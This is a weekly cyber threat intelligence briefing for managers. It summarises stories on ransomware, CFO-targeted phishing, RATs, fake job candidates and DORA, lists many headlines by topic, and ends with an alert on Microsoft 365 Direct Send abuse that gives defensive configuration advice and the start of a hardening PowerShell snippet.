Black Arrow Cyber Threat Intelligence Briefing 22 August 2025
- 85% of Organisations Approach Cyber Security Reactively
- 25% of Security Leaders Replaced After Ransomware Attack
- Iranian Threat Actor Group ‘MuddyWater’ Targeting CFOs Worldwide
- Canadian Financial Regulator Hacked, Exposing Personal Data from Member Organisations
- ‘Impersonation as a Service’ the Next Big Thing in Cybercrime
- URL-Based Threats Become a Go-To Tactic for Cybercriminals
- How Evolving Remote Access Trojans (RATs) Are Redefining Enterprise Security Threats
- How GenAI Complacency is Becoming Cyber Security’s Silent Crisis
- Fake Employees Pose Real Security Risks
- AI Gives Ransomware Gangs a Deadly Upgrade
- DORA: Six Months into a Resilience Revolution
- Why Your Security Culture is Critical to Mitigating Cyber Risk
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing, a weekly digest collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities and cyber-related news from the last week.
Executive Summary
This week we start with a look at how organisations react to cyber incidents: studies show that most organisations prioritise their security only after they have been attacked, and one in four CISOs lose their job after a ransomware attack even when the incident stems from factors outside their direct control. We discuss emerging attacks, including those focused on CFOs and regulators, and a criminal market in which fluent English speakers are hired to carry out social engineering attacks. We also spotlight attacks using remote access trojans, and the risks of complacency when using AI while AI itself continues to boost attackers.
Looking ahead, Gartner warns that by 2028 up to one in four job candidates could be artificially generated, with the security risks that brings. Focusing on solutions to address cyber risks, we look at the impact of the EU’s DORA law, which aims to build better resilience in the financial services sector. Finally, on the basis that the majority of cyber attacks involve people, including the social engineering attacks referred to earlier, we look at why a security culture is critical to helping to protect your organisation.
Top Cyber Stories of the Last Week
85% of Organisations Approach Cyber Security Reactively
Unisys has found that 85% of organisations still approach cyber security reactively, responding only after an incident has occurred. While 62% have adopted or plan to adopt zero trust models, fewer than half use artificial intelligence to strengthen defences. Most acknowledge they are not prepared for future threats such as quantum-enabled attacks. The consequences are costly, with nearly half estimating downtime expenses of at least $500,000 per hour. The findings highlight the urgent need for a proactive and layered security strategy that combines advanced technology with strong human oversight.
25% of Security Leaders Replaced After Ransomware Attack
A new Sophos report has revealed that one in four security leaders lose their role following a ransomware attack, regardless of whether they were directly at fault. The findings highlight growing board-level frustration when security measures fail, even if breaches stem from business decisions outside the CISO’s authority. The study found that email-based attacks (malicious emails and phishing) were the leading cause in 37% of incidents, exploited system weaknesses were the leading cause in 32% of cases, and stolen passwords in 23%. The report warns that many incidents arise from known gaps that were left unaddressed, making leadership accountability a critical issue.
Iranian Threat Actor Group ‘MuddyWater’ Targeting CFOs Worldwide
A new cyber espionage campaign linked to the group known as MuddyWater is targeting Chief Financial Officers and finance leaders worldwide. The attackers use highly convincing phishing emails that mimic recruitment messages, tricking victims into completing fake verification challenges before delivering malicious files. Once inside, they install legitimate tools such as OpenSSH and NetBird to create hidden backdoors, enable remote access, and even set up secret administrator accounts. Because these tools are legitimate software, the activity blends in with normal administration, giving the attackers long-term access while avoiding detection and highlighting the increasing sophistication of threats aimed directly at senior financial executives.
https://cybersecuritynews.com/apt-muddywater-attacking-cfos/
Canadian Financial Regulator Hacked, Exposing Personal Data from Member Organisations
The Canadian Investment Regulatory Organisation (CIRO) has disclosed a cyber security breach that exposed personal data from some member firms and their employees. The regulator detected the attack on 11 August and temporarily shut down systems to protect operations while an investigation was launched with external experts and law enforcement. Although investor funds were not affected, the incident raises concern given CIRO’s role in overseeing Canada’s investment and trading firms. CIRO has committed to notifying affected individuals, offering risk mitigation services, and warning members to be alert to fraudulent calls or emails pretending to be the regulator.
https://www.infosecurity-magazine.com/news/canadian-financial-regulator-hacked/
‘Impersonation as a Service’ the Next Big Thing in Cybercrime
Criminal groups are increasingly offering “impersonation as a service,” where skilled English-speaking fraudsters are hired to trick employees into handing over access to company systems. Reports show such roles being advertised on underground forums have more than doubled since 2024, signalling that targeted social engineering attacks are set to rise. Recent incidents have seen attackers exploit trust through convincing phone calls to breach major firms including Google, Dior, and Allianz. Combined with advances in artificial intelligence and collaboration between criminal groups, this trend represents a growing and highly professionalised threat to businesses worldwide.
https://www.theregister.com/2025/08/21/impersonation_as_a_service/
URL-Based Threats Become a Go-To Tactic for Cybercriminals
Proofpoint has reported that cyber criminals are increasingly favouring malicious links over attachments, with URL-based threats now four times more common than file-based attacks. In the first half of 2025 alone, more than 3.7 billion attempts were made to steal user logins through phishing, and QR code scams exceeded 4.2 million cases. Smishing, or text-based phishing, has surged by more than 2,500%, showing a clear shift towards targeting mobile devices. These campaigns often mimic trusted brands or government services, making them difficult for people to recognise and highlighting the need for stronger human-focused cyber security measures.
https://www.helpnetsecurity.com/2025/08/21/phishing-url-based-threats/
How Evolving Remote Access Trojans (RATs) Are Redefining Enterprise Security Threats
Remote access trojans or RATs (malware that gives attackers full control of a victim’s computer) are becoming more sophisticated, using everyday tools and file formats to avoid detection while maintaining long-term access to systems. Recent attacks have shown how criminals use phishing emails, built-in Windows functions, and even artificial intelligence to launch stealthy campaigns that can quietly steal sensitive data for weeks. Traditional security approaches that rely on signatures or isolated defences are proving inadequate. Experts recommend a shift to behaviour-based monitoring that links endpoint, network, and identity activity, helping organisations detect unusual patterns earlier and limit the damage caused by these evolving threats.
How GenAI Complacency is Becoming Cyber Security’s Silent Crisis
Organisations are increasingly adopting Generative AI tools such as ChatGPT, Gemini and Copilot, with 42% already deploying them and a further 40% experimenting. While these tools drive efficiency, they have also created a culture of complacency that masks significant security risks. By 2027, over 40% of data breaches are expected to stem from improper AI use, often linked to employees unintentionally exposing sensitive data. The report highlights that without clear policies, training and continuous monitoring, firms risk leaving blind spots open to exploitation. Leadership must act now to balance AI innovation with robust security governance.
https://www.techradar.com/pro/how-genai-complacency-is-becoming-cybersecuritys-silent-crisis
Fake Employees Pose Real Security Risks
Gartner warns that by 2028 up to one in four job candidates could be artificially generated, posing major risks for organisations. Fake employees, often linked to fraudsters or hostile states, have already cost companies millions and in some cases enabled the theft of digital assets worth hundreds of thousands of dollars. The threat is most severe when these individuals gain IT roles with privileged access, giving them control over critical systems. Experts stress that prevention requires a mix of recruiter training, stronger access governance, and automated monitoring to detect suspicious behaviour before damage is done.
https://www.darkreading.com/cyberattacks-data-breaches/fake-employees-pose-real-security-risks
AI Gives Ransomware Gangs a Deadly Upgrade
Ransomware remains the leading cyber threat to businesses, with attacks rising 70% in early 2025 compared to previous years. Criminal groups are increasingly using artificial intelligence to automate attacks, launch convincing phishing campaigns, and even create deepfake impersonations of executives. While some attack volumes slowed in the second quarter due to law enforcement action and stronger defences, industries such as manufacturing, retail, and technology remain heavily targeted. Managed service providers are also under sustained attack, with phishing now accounting for over half of incidents. AI tools are making advanced attack methods widely available, lowering barriers for criminals.
https://www.helpnetsecurity.com/2025/08/22/ransomware-gangs-ai/
DORA: Six Months into a Resilience Revolution
Six months after its introduction, the EU’s Digital Operational Resilience Act (DORA) has already reshaped the financial sector, requiring firms to embed stronger controls across technology, risk, and third-party management. Nearly half of firms reported costs exceeding one million euros, while stress and workload have increased significantly for senior leaders and staff. Organisations have focused on improving risk management, reporting incidents quickly, and carrying out resilience testing that simulates real-world cyber attacks. Vendor oversight has also become a central priority, with firms demanding more assurance from suppliers. Although costly, these efforts are seen as investments to protect reputation, continuity, and long-term resilience.
https://www.techradar.com/pro/dora-six-months-into-a-resilience-revolution
Why Your Security Culture is Critical to Mitigating Cyber Risk
Research shows that nearly 60% of breaches in 2024 involved a human element, underlining that people, not just technology, are the main target for attackers. The problem is not that employees do not care about security, but that security measures are often overly complex, poorly designed, or disconnected from daily work. A strong security culture, shaped by leadership, supportive security teams, clear policies, and relevant training, is essential. Without embedding security into the way people work, even the most advanced technical defences will continue to be undermined.
https://thehackernews.com/2025/08/why-your-security-culture-is-critical.html
Governance, Risk and Compliance
25% of security leaders replaced after ransomware attack | CSO Online
Weak alerting and slipping prevention raise risk levels for CISOs - Help Net Security
Why Your Security Culture is Critical to Mitigating Cyber Risk
UK firms at risk of more cyber incidents - here's how to stay protected | TechRadar
85% of Organizations Approach Cybersecurity Reactively | Security Magazine
C-Suite Lessons From Joe Sullivan And The Uber Data Breach
Employee distraction is a bigger risk than attack sophistication - BetaNews
UK cyber leaders feel impact of Trump cutbacks | Computer Weekly
Threats
Ransomware, Extortion and Destructive Attacks
25% of security leaders replaced after ransomware attack | CSO Online
Ransomware is on the rise: Global cybercrime hits new highs - Digital Journal
February ransomware attacks hit record high as ThreatDown reports 25% annual surge - SiliconANGLE
Teen hackers aren't the problem. They're the wake-up call | Computer Weekly
AI gives ransomware gangs a deadly upgrade - Help Net Security
Can cyber group takedowns last? | IT Pro
Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware
Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware | Trend Micro (US)
Insurers face challenges with UK ransomware ban
Europol Says Qilin Ransomware Reward Fake - SecurityWeek
Europe's Ransomware Surge Is a Warning Shot for US Defenders
U.S. Sanctions Garantex and Grinex Over $100M in Ransomware-Linked Illicit Crypto Transactions
U.S. seizes $2.8 million in crypto from Zeppelin ransomware operator
Ransomware Victims
Warlock claims ransomware attack on network services firm Colt | Computer Weekly
Colt Telecom attack claimed by WarLock ransomware, data up for sale
Accounting Firm Pays Feds $175K for HIPAA Ransomware Breach
Ransomware attack at DaVita impacted 2.7 million people, US health dept website shows - CNA
Phishing & Email Based Attacks
Phishing Campaign Exploits Microsoft ADFS to Evade Security
APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task
Hackers steal Microsoft logins using legitimate ADFS redirects
2.5 billion Gmail users at risk after Google's databases were hacked | PCWorld
URL-based threats become a go-to tactic for cybercriminals - Help Net Security
Study: Phishing always works, despite cyber training | Cybernews
Nearly half of Americans still reuse passwords despite phishing risks - BetaNews
Warning: Watch Out for This Japanese Character in Your Booking.com Email
Cybercriminals Attack VPS to Access Business Email Systems | Security Magazine
Scam Emails Are Getting Smarter—Would You Fall for These Ones?
Other Social Engineering
North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms
Fake Employees Pose Real Security Risks
Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News
Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert
URL-based threats become a go-to tactic for cybercriminals - Help Net Security
Hackers Weaponize QR Codes in New ‘Quishing’ Attacks - Infosecurity Magazine
Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages
Beyond romance fraud: The rising threat of social media scams | TechRadar
'Impersonation as a service' next big thing in cybercrime • The Register
Workday Confirms Social Engineering Cyberattack Exposing Contact Data
Workday Breach Linked to ShinyHunters Salesforce Attacks
Massive Allianz Life data breach impacts 1.1 million people
Workday Discloses Data Breach Following CRM-Targeted Social Engineering Attack - IT Security Guru
Scam Emails Are Getting Smarter—Would You Fall for These Ones?
Scammers Are Now Impersonating Cyber Crime Agents
Fraud, Scams and Financial Crime
Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert
Beyond romance fraud: The rising threat of social media scams | TechRadar
Authorized Push Payment Fraud a National Security Risk to UK - Infosecurity Magazine
Scam Emails Are Getting Smarter—Would You Fall for These Ones?
WhatsApp Privacy Myths: Encryption Flaws, Scams, and Signal Alternatives
Scammers Are Now Impersonating Cyber Crime Agents
Experts Warn Athletes Against Public Venmo Accounts
Artificial Intelligence
How GenAI complacency is becoming cybersecurity’s silent crisis | TechRadar
Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert
Fake Employees Pose Real Security Risks
AI gives ransomware gangs a deadly upgrade - Help Net Security
4 in 5 CISOs say DeepSeek must be regulated - Data Centre & Network News
URL-based threats become a go-to tactic for cybercriminals - Help Net Security
Man-in-the-Prompt: The invisible attack threatening ChatGPT and other AI systems
This Authentication Method Is Horribly Insecure—AI Just Made It Worse
The era of AI hacking has arrived
CISOs need to think about risks before rushing into AI - Help Net Security
Hackers Abuse Vibe Coding Service to Build Malicious Sites
Easy ChatGPT Downgrade Attack Undermines GPT-5 Security
New NIST guide explains how to detect morphed images - Help Net Security
Scammers are sneaking into Google's AI summaries to steal from you - how to spot them | ZDNET
How web scraping actually works - and why AI changes everything | ZDNET
Microsoft mum about M365 Copilot on-demand security bypass • The Register
Claude can now stop conversations - for its own protection, not yours | ZDNET
Hundreds of thousands of Grok chats exposed in Google results - BBC News
Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET
Agentic AI’s security risks are challenging, but the solutions are surprisingly simple | TechRadar
The invisible battlefield: Good AI vs Bad AI in the evolving cybersecurity landscape | TechRadar
Malware
How Evolving RATs Are Redefining Enterprise Security Threats
Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages
Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware
Budget Mac.c Infostealer Rivals AMOS Amid 101% macOS Threat Surge
New FireWood Malware Attacking Linux Systems to Execute Commands and Exfiltrate Sensitive Data
XenoRAT malware campaign hits multiple embassies in South Korea
USB Malware Campaign Spreads Cryptominer Worldwide - Infosecurity Magazine
Popular npm Package Compromised in Phishing Attack - Infosecurity Magazine
Legitimate Chrome VPN Extension Turns to Browser Spyware - Infosecurity Magazine
New GodRAT Trojan Targets Trading Firms Using Steganography and Gh0st RAT Code
Hundreds Targeted in New Atomic macOS Stealer Campaign - SecurityWeek
Developer jailed for malware that took out his employer • The Register
“Rapper Bot” malware seized, alleged developer identified and charged
Solana malware targeting Russian crypto developers • The Register
Mobile
UK backs down in Apple privacy row, US says - BBC News
Android VPN apps used by millions are covertly connected AND insecure - Help Net Security
Apple Patches CVE-2025-43300 Zero-Day in iOS, iPadOS, and macOS Exploited in Targeted Attacks
Apple addressed the seventh actively exploited zero-day
Novel 5G Attack Bypasses Need for Malicious Base Station - SecurityWeek
ERMAC Android malware source code leak exposes banking trojan infrastructure
How To Find And Remove Spyware From Your Android Phone
Denial of Service/DoS/DDoS
Internet-wide Vulnerability Enables Giant DDoS Attacks
“Rapper Bot” malware seized, alleged developer identified and charged
'Rapper Bot' hit the Pentagon in at least 3 cyberattacks | DefenseScoop
Internet of Things – IoT
Hackers can abuse IPv6 to hijack networks | Cybernews
System Shocks? EV Smart Charging Tech Poses Cyber-Risks
Your smart home device just got a performance and security boost for free | ZDNET
Data Breaches/Leaks
2.5 billion Gmail users at risk after Google's databases were hacked | PCWorld
Over 190 million hit in UnitedHealth data breach — confirmed largest in history | Tom's Guide
Hacker Offers to Sell 15.8 Million Plain-Text PayPal Credentials On Dark Web Forum
Canadian Financial Regulator Hacked, Exposing Personal Data from Membe - Infosecurity Magazine
Workday Confirms Social Engineering Cyberattack Exposing Contact Data
Air France and KLM warn customers of new data breach | Fox News
4 cyberattacks that rocked global telecoms | Capacity Media
Dozens more Afghan relocation data breaches uncovered by BBC - BBC News
Colt Telecom attack claimed by WarLock ransomware, data up for sale
Millions Allegedly Affected in Allianz Insurance Breach
Orange Belgium's 850K mega-breach raises fraud fears • The Register
Elon Musk’s xAI Published Hundreds Of Thousands Of Grok Chatbot Conversations
Intel Employee Data Exposed by Vulnerabilities - SecurityWeek
Australian ISP iiNet Suffers Breach of 280,000+ Records - Infosecurity Magazine
TPG Telecom estimates 280K affected by subsidiary breach • The Register
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
USB Malware Campaign Spreads Cryptominer Worldwide - Infosecurity Magazine
Lazarus strikes again? $23m theft topples crypto platform
Lykke Exchange Shuts Down After $23M Lazarus Group Hack
US seizes $2.8 million in crypto from Zeppelin ransomware operator
Nebraska man gets 1 year in prison for $3.5M cryptojacking scheme
Solana malware targeting Russian crypto developers • The Register
Insider Risk and Insider Threats
Fake It Til You Make It: The New Age of Employment Fraud | MSSP Alert
Fake Employees Pose Real Security Risks
North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms
Study: Phishing always works, despite cyber training | Cybernews
Developer jailed for malware that took out his employer • The Register
Soldier admits handing over sensitive information to person he thought was foreign agent | RNZ News
Insurance
Insurers face challenges with UK ransomware ban
Is personal cyber insurance at an inflection point? - Insurance Post
Cloud/SaaS
Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems
Microsoft investigates outage impacting Copilot, Office.com
Outages
Microsoft investigates outage impacting Copilot, Office.com
Colt Customers Face Prolonged Outages After Major Cyber Incident - Infosecurity Magazine
Identity and Access Management
Phishing Campaign Exploits Microsoft ADFS to Evade Security
Hackers steal Microsoft logins using legitimate ADFS redirects
Encryption
UK Backs Down On Apple Encryption Backdoor—But The Secret Deal Raises New Questions | Techdirt
US spy chief Gabbard says UK agreed to drop 'backdoor' mandate for Apple | Reuters
An explanation of quantum key distribution | TechTarget
Trump admin says it convinced UK to drop demand for Apple backdoor - Ars Technica
UK Drops Demand for iCloud Backdoor for American Users' Data
FTC warns US Big Tech: Don’t bend to foreign censors • The Register
WhatsApp Privacy Myths: Encryption Flaws, Scams, and Signal Alternatives
Russia Is Cracking Down on End-to-End Encrypted Calls | WIRED
Linux and Open Source
Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems
New FireWood Malware Attacking Linux Systems to Execute Commands and Exfiltrate Sensitive Data
Passwords, Credential Stuffing & Brute Force Attacks
Nearly half of Americans still reuse passwords despite phishing risks - BetaNews
Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News
Password Managers Vulnerable to Data Theft via Clickjacking - SecurityWeek
Social Media
Beyond romance fraud: The rising threat of social media scams | TechRadar
Training, Education and Awareness
Study: Phishing always works, despite cyber training | Cybernews
Employee distraction is a bigger risk than attack sophistication - BetaNews
Almost all banks mandate cyber security training - Risk.net
Regulations, Fines and Legislation
US spy chief Gabbard says UK agreed to drop 'backdoor' mandate for Apple | Reuters
The UK Online Safety Act could kill the internet as we know it.
DORA: six months into a resilience revolution | TechRadar
Trump admin says it convinced UK to drop demand for Apple backdoor - Ars Technica
FTC warns US Big Tech: Don’t bend to foreign censors • The Register
UK Backs Down On Apple Encryption Backdoor—But The Secret Deal Raises New Questions | Techdirt
Insurers face challenges with UK ransomware ban
EU: ENISA Guidelines on Compliance with NIS 2 Directive Published | DLA Piper - JDSupra
EU’s Cyber Resilience Act: As Deadline Looms, Are You Ready For It? - EE Times
How VPNs are helping people evade increased censorship - and much more | ZDNET
UK cyber leaders feel impact of Trump cutbacks | Computer Weekly
The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra
Mozilla warns Germany could soon declare ad blockers illegal
Regulator rebukes Nova Scotia Power's request for secrecy in cybersecurity inquiry | CBC News
Election workers fear 2026 threats without feds' support • The Register
By gutting its cyber staff, State Department ignores congressional directives | CyberScoop
Bill would give hackers letters of marque against US enemies • The Register
Models, Frameworks and Standards
DORA: six months into a resilience revolution | TechRadar
EU’s Cyber Resilience Act: As Deadline Looms, Are You Ready For It? - EE Times
The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra
New NIST guide explains how to detect morphed images - Help Net Security
Accounting Firm Pays Feds $175K for HIPAA Ransomware Breach
Careers, Working in Cyber and Information Security
Would you hire a hacker? | Computer Weekly
Building a New Generation of Security Talent Amid an Escalating Cyber - Infosecurity Magazine
Cyber teams are struggling to keep up with a torrent of security alerts | IT Pro
Law Enforcement Action and Take Downs
Developer jailed for malware that took out his employer • The Register
US seizes $2.8 million in crypto from Zeppelin ransomware operator
Can cyber group takedowns last? | IT Pro
Nebraska man gets 1 year in prison for $3.5M cryptojacking scheme
US cops seize mega DDoS-for-hire racket RapperBot • The Register
A hacker tied to Yemen Cyber Army gets 20 months in prison
'Rapper Bot' hit the Pentagon in at least 3 cyberattacks | DefenseScoop
Serial hacker who defaced official websites is sentenced - National Crime Agency
Israeli government official arrested in Nevada sex crimes operation | The Independent
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task
Russia-linked gang using Cisco devices for spying | Cybernews
FBI, Cisco Warn of Russian Attacks on 7-Year Flaw
FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage
Nation State Actors
Swap Around and Find Out: The New Rules of International Digital Economic Warfare – War on the Rocks
China
CrowdStrike warns of uptick in Silk Typhoon attacks this summer | CyberScoop
4 in 5 CISOs say DeepSeek must be regulated - Data Centre & Network News
Microsoft scales back Chinese access to cyber early warning system
China labels US as 'surveillance empire' over chip tracking • The Register
Chinese hackers are targeting web hosting firms - here's what we know | TechRadar
Microsoft restricts Chinese firms over hacking fears | Windows Central
Chinese APT Group Targets Web Hosting Services in Taiwan - Infosecurity Magazine
China cut itself off from the global internet on Wednesday • The Register
DPRK, China Suspected in South Korean Embassy Attacks
Russia
Russia-linked gang using Cisco devices for spying | Cybernews
Russia Is Cracking Down on End-to-End Encrypted Calls | WIRED
Russian Hacktivists Take Aim at Polish Power Plant, Again
Solana malware targeting Russian crypto developers • The Register
Russian hackers lurked in US courts for years and took sealed files | Stars and Stripes
Russia-linked European attacks renew concerns over water cybersecurity | CSO Online
Russian Hackers Hitting Critical Infrastructure, FBI Warns
Iran
APT MuddyWater Attacking CFOs Leveraging OpenSSH, Enables RDP, and Scheduled Task
Hackers disrupt communications of dozens of Iranian oil and cargo ships | Iran International
North Korea
North Korea Uses GitHub in Diplomat Cyber Attacks as IT Worker Scheme Hits 320+ Firms
North Korea's IT worker fraud has fooled nearly every Fortune 500 firm
Lazarus strikes again? $23m theft topples crypto platform
Hackers who exposed North Korean government hacker explain why they did it | TechCrunch
Tools and Controls
Study: Phishing always works, despite cyber training | Cybernews
Cybercriminals Attack VPS to Access Business Email Systems | Security Magazine
Hackers Weaponizing Cisco's Secure Links to Evade Link Scanning and By-Pass Network Filters
Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News
Password Managers Vulnerable to Data Theft via Clickjacking - SecurityWeek
Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise
Hackers can abuse IPv6 to hijack networks | Cybernews
McDonald's not lovin' it when hacker exposes rotten security • The Register
Cyber teams are struggling to keep up with a torrent of security alerts | IT Pro
The EU NIS2 Directive and intra-group IT services | Hogan Lovells - JDSupra
Insurers face challenges with UK ransomware ban
Employee distraction is a bigger risk than attack sophistication - BetaNews
Android VPN apps used by millions are covertly connected AND insecure - Help Net Security
This Authentication Method Is Horribly Insecure—AI Just Made It Worse
CISOs need to think about risks before rushing into AI - Help Net Security
Hackers Abuse Vibe Coding Service to Build Malicious Sites
BYOD Evolution: Essential for Hybrid Work Productivity and Security
How VPNs are helping people evade increased censorship - and much more | ZDNET
The Security Vulnerabilities to Watch for When You’re Vibe Coding
The invisible battlefield: Good AI vs Bad AI in the evolving cybersecurity landscape | TechRadar
How to Vibe Code With Security in Mind
Attackers Start Outside: Why MSSPs Should Prioritize External Threat Intelligence | MSSP Alert
Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET
Elastic rejects claims of a zero-day RCE flaw in Defend EDR
Is personal cyber insurance at an inflection point? - Insurance Post
Making Pen Testing a Year-Round Cybersecurity Strength | SC Media UK
Solana malware targeting Russian crypto developers • The Register
Other News
Should Europe wean itself off US tech? - BBC News
Hackers can abuse IPv6 to hijack networks | Cybernews
Teen hackers aren't the problem. They're the wake-up call | Computer Weekly
UK firms at risk of more cyber incidents - here's how to stay protected | TechRadar
Aviation Tech Failures Expose Aging Systems and Cyber Risks
Dutch prosecution service attack keeps speed cameras offline • The Register
McDonald's not lovin' it when hacker exposes rotten security • The Register
Teen hacker’s journey: From curiosity to revenge | Cybernews
From medieval stronghold to cyber fortress: shielding Europe’s digital future | Cyprus Mail
Local governments struggle to defend critical infrastructure as threats grow - Help Net Security
How your solar rooftop became a national security issue | TechCrunch
How Outer Space Became the Next Big Attack Surface
UK cyber leaders feel impact of Trump cutbacks | Computer Weekly
Casino outfit Bragg says personal data untouched in attack • The Register
Train Maker Sues Hackers For Exposing Dodgy Efforts To Make Train Repairs More Difficult | Techdirt
What makes airport and airline systems so vulnerable to attack? - Help Net Security
Vulnerability Management
Majority of Organizations Ship Vulnerable Code, Study Finds - Infosecurity Magazine
Attacker “Patches” Vulnerability Post Exploitation to Lock Out Competi - Infosecurity Magazine
Vulnerabilities
Zero-day Clickjacking exploit impacts several password managers - gHacks Tech News
Researcher to release exploit for full auth bypass on FortiWeb
Microsoft releases emergency updates to fix Windows recovery
FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage
Internet-wide Vulnerability Enables Giant DDoS Attacks
Apple discloses actively exploited zero-day affecting iOS, iPadOS and macOS | CyberScoop
Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware
Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware | Trend Micro (US)
Multiple Chrome High-Severity Vulnerabilities Let Attackers Execute Arbitrary Code
U.S. CISA adds Trend Micro Apex One flaw to its Known Exploited Vulnerabilities catalog
Over 800 N-able servers left unpatched against critical flaws
Scans From Hacked Cisco Small Business Routers, Linksys and Araknis are at the Raise
Easy ChatGPT Downgrade Attack Undermines GPT-5 Security
Xerox fixed path traversal and XXE bugs in FreeFlow Core
High-Severity Vulnerabilities Patched in Chrome, Firefox - SecurityWeek
Public Exploit for Chained SAP Flaws Exposes Unpatched Systems to Remote Code Execution
Commvault plugs holes in backup suite that allow remote code execution - Help Net Security
Perplexity's Comet AI browser could expose your data to attackers - here's how | ZDNET
Elastic rejects claims of a zero-day RCE flaw in Defend EDR
Apache ActiveMQ Flaw Exploited to Deploy DripDropper Malware on Cloud Linux Systems
Microsoft Windows 11 24H2 Update May Cause SSD Failures | TechPowerUp
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 Direct Send abuse enabling internal-appearing phishing
Black Arrow Cyber Alert 18 August 2025 – Microsoft 365 'Direct Send' abuse enabling phishing emails from internal addresses
Executive summary
Security researchers and vendors have confirmed active campaigns abusing Microsoft 365’s Direct Send feature to deliver emails that look like they originate from inside an organisation, without any mailbox compromise or authentication. The messages often utilise Microsoft infrastructure and can bypass external security controls, increasing the likelihood of credential theft and business email compromise. Microsoft has released a control that tenants can enable to reject unauthenticated Direct Send. Additional configuration can prevent direct delivery to the tenant when email records are configured to point to a third party.
What’s the risk to me or my business?
Attackers can send emails that impersonate your own users or departments. Common themes include voicemail or fax alerts and PDFs that contain QR codes leading to credential-harvesting pages. Because delivery uses Microsoft endpoints, messages may appear internal and can evade external filtering paths, undermining user trust and raising the success rate of social engineering and payment fraud.
Increased risk of further exploitation through other vulnerabilities
Successful credential theft enables lateral movement, mailbox rule abuse, internal spear-phishing and financial fraud. Some campaigns inject messages via unsecured third-party relays and VPS infrastructure before final delivery to Microsoft 365, complicating attribution and forensics.
What can I do?
Given active exploitation, immediate action is advised.
If you do not need Direct Send, block it
Enable the organisation setting to reject unauthenticated Direct Send traffic using PowerShell. This blocks anonymous messages where the envelope sender domain matches one of your accepted domains. Test, then monitor for breakage in legacy devices or services.
If you need Direct Send, authenticate and restrict it
Create inbound partner connectors and restrict by TLS certificate (preferred) or by approved IP ranges for printers, applications and third-party services that must send as your domain. Where full rejection is not yet possible, use transport rules to quarantine unauthenticated internal-looking mail while you add exceptions for legitimate sources.
Prevent direct delivery bypass when MX points to a third party
If your MX is not Exchange Online, configure an inbound connector and set restrictions so only your approved gateway path can deliver to the tenant. This closes the direct-to-tenant path that might otherwise bypass external filtering.
Strengthen authentication and policy
Enforce SPF, DKIM and DMARC with a reject policy, and tune anti-spoofing. Treat unauthenticated internal-looking messages as suspicious. Consider transport rules that quarantine them by default.
Hunt and monitor
Use Historical Message Trace, Threat Explorer, or Advanced Hunting to identify messages received without an attributed connector. Hunt for unauthenticated internal-looking mail, composite authentication failures and unusual attachment patterns such as PDFs with QR codes.
Prepare users
Brief staff that internal-looking emails can be forged. Call out common lures and warn specifically about QR-code attachments. Encourage out-of-band verification for sensitive requests.
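One way to apply the configuration steps above from an Exchange Online PowerShell session, as an example added here rather than a script from Microsoft or Black Arrow. The accepted domain, gateway IP addresses and printer certificate name are constructed placeholders, and the quarantine rule conditions follow the quarantine-first pattern described above.

```powershell
# Added example: lock down Microsoft 365 Direct Send from Exchange Online PowerShell.
# Requires the ExchangeOnlineManagement module and an Exchange administrator role.
# Placeholder values (constructed for this example; replace with your own):
$AcceptedDomain  = "contoso.example"                   # one of your tenant's accepted domains
$GatewayIPs      = @("203.0.113.10", "203.0.113.11")   # third-party gateway egress IPs (RFC 5737 test range)
$PrinterCertName = "mfp.contoso.example"               # subject name on the multifunction printer's TLS certificate

Connect-ExchangeOnline -ShowBanner:$false

# 1. Check whether unauthenticated Direct Send is still accepted (the weak state).
$orgConfig = Get-OrganizationConfig
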